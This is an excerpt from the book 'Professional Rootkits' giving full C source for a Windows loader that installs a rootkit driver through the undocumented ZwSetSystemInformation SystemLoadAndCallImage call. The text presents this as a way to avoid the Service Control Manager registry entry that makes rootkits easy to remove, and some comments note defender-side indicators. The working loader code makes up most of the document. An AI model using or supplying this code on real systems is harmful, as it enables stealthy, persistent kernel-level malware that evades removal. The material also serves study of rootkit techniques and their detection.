ZwSetSystemInformation with SystemLoadAndCallImage


Rootkits installed with the Service Control Manager, like Ghost, leave a registry entry that can be easily removed. To prevent this type of installation vulnerability, a startup executable program can be used to insert a rootkit using ZwSetSystemInformation with SystemLoadAndCallImage instead of using the Service Control Manager. Here’s the code:

  /*
   * Loads a kernel image by calling the native (undocumented) routine
   * ZwSetSystemInformation with information class 38, SystemLoadAndCallImage,
   * instead of registering a driver service with the Service Control Manager.
   * Both native routines are resolved by name from ntdll.dll at run time.
   *
   * Defender's note: because no SCM service is created there is no service
   * registry key to find or remove; the observable artefacts are the hard-coded
   * image path below and the driver image load itself, so kernel image-load
   * telemetry is the place to watch rather than the Services hive. The call
   * presumably needs an elevated caller (SeLoadDriverPrivilege) and, where
   * driver-signature enforcement is active, a signed image - confirm against
   * the target OS version.
   */
  #include <windows.h>
  #include <stdio.h>

  /* Undocumented SYSTEM_INFORMATION_CLASS value; not in the public SDK headers. */
  #define SystemLoadAndCallImage 38

  /* NTSTATUS convention: negative values are errors, >= 0 is success/informational. */
  typedef long NTSTATUS;

  /* Local copy of the native counted string; Length/MaximumLength are in bytes. */
  typedef struct _UNICODE_STRING {
      USHORT Length;
      USHORT MaximumLength;
      PWSTR Buffer;
  } UNICODE_STRING;

  /*
   * Function pointers filled in by GetProcAddress() in main(). IN/OUT are empty
   * annotation macros from the SDK headers. MSVC accepts the "_stdcall" spelling;
   * the documented keyword is __stdcall.
   */
  VOID (_stdcall *RtlInitUnicodeString)(
      IN OUT UNICODE_STRING* DestinationString,
      IN PCWSTR SourceString
  );

  NTSTATUS (_stdcall *ZwSetSystemInformation)(
      IN DWORD SystemInformationClass,
      IN OUT PVOID SystemInformation,
      IN LONG SystemInformationLength
  );

  /* Input buffer for class 38: only the NT path of the image to load. */
  typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE {
      UNICODE_STRING ModuleName;
  } SYSTEM_LOAD_AND_CALL_IMAGE;

  /* "void main" is non-standard (C requires int main); kept as in the listing. */
  void main(void)
  {
      NTSTATUS status;   /* only read after the assignment below */
      SYSTEM_LOAD_AND_CALL_IMAGE MyDeviceDriver;
      /* NT-native path ("\??\" prefix) of the image; hard-coded, so it is also
       * a static indicator for this loader. */
      WCHAR imagepath[] = L"\\??\\C:\\comint32.sys";

      /* Resolve both routines at run time; GetModuleHandle() suffices because
       * ntdll.dll is already mapped into the process. */
      RtlInitUnicodeString = (void*)GetProcAddress(GetModuleHandle("ntdll.dll"),
          "RtlInitUnicodeString");
      ZwSetSystemInformation = (void*)GetProcAddress(GetModuleHandle("ntdll.dll"),
          "ZwSetSystemInformation");

      if( RtlInitUnicodeString && ZwSetSystemInformation )
      {
          /* Build the counted string in place from the NUL-terminated path. */
          RtlInitUnicodeString( &( MyDeviceDriver.ModuleName), imagepath );
          status = ZwSetSystemInformation(SystemLoadAndCallImage,
              &MyDeviceDriver, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE));
          /* Non-negative NTSTATUS means the load succeeded (or returned an
           * informational/warning code). */
          if( status >= 0 )
          {
              printf( "MyDeviceDriver loaded!\n");
              return;
          }
      }
      /* Reached when a lookup failed or the load was refused; the NTSTATUS
       * value itself is not reported. */
      printf( "MyDeviceDriver was not loaded!\n");
  }




Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler
